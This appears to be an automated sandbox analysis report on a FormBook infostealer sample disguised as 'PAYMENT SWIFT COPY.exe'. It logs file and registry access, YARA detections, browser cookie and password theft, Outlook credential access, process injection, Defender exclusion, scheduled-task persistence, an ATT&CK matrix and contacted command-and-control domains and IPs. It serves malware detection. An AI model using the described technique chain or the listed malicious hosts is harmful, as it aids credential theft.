                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618747 Sample: PAYMENT SWIFT COPY.exe Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 61 www.vaishnavi.xyz 2->61 63 www.sidang.xyz 2->63 65 18 other IPs or domains 2->65 79 Suricata IDS alerts for network traffic 2->79 81 Sigma detected: Scheduled temp file as task from temp location 2->81 83 Multi AV Scanner detection for submitted file 2->83 87 8 other signatures 2->87 10 PAYMENT SWIFT COPY.exe 7 2->10         started        14 NCchtKNKiPqC.exe 5 2->14         started        signatures3 85 Performs DNS queries to domains with low reputation 63->85 process4 file5 53 C:\Users\user\AppData\...53CchtKNKiPqC.exe, PE32 10->53 dropped 55 C:\Users\...55CchtKNKiPqC.exe:Zone.Identifier, ASCII 10->55 dropped 57 C:\Users\user\AppData\Local\...\tmpFA76.tmp, XML 10->57 dropped 59 C:\Users\user\...\PAYMENT SWIFT COPY.exe.log, ASCII 10->59 dropped 97 Adds a directory exclusion to Windows Defender 10->97 16 PAYMENT SWIFT COPY.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        99 Multi AV Scanner detection for dropped file 14->99 25 NCchtKNKiPqC.exe 14->25         started        27 schtasks.exe 1 14->27         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 16->73 29 drfYhRLxnrcfFY.exe 16->29 injected 75 Loading BitLocker PowerShell Module 19->75 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 27->40         started        process9 signatures10 101 Maps a DLL or memory area into another process 29->101 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 xcopy.exe 29->42         started        45 xcopy.exe 29->45         started        process11 signatures12 89 Tries to steal Mail credentials (via file / registry access) 42->89 91 Tries to harvest and steal browser information (history, passwords, etc) 42->91 93 Modifies the context of a thread in another process (thread injection) 42->93 95 3 other signatures 42->95 47 drfYhRLxnrcfFY.exe 42->47 injected 51 firefox.exe 42->51         started        process13 dnsIp14 67 www.tkloqr.info 47.83.1.90, 50065, 50066, 50067 VODANETInternationalIP-BackboneofVodafoneDE United States 47->67 69 031235045.xyz 144.76.229.203, 50025, 50026, 50027 HETZNER-ASDE Germany 47->69 71 8 other IPs or domains 47->71 77 Found direct / indirect Syscall (likely to bypass EDR) 47->77 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.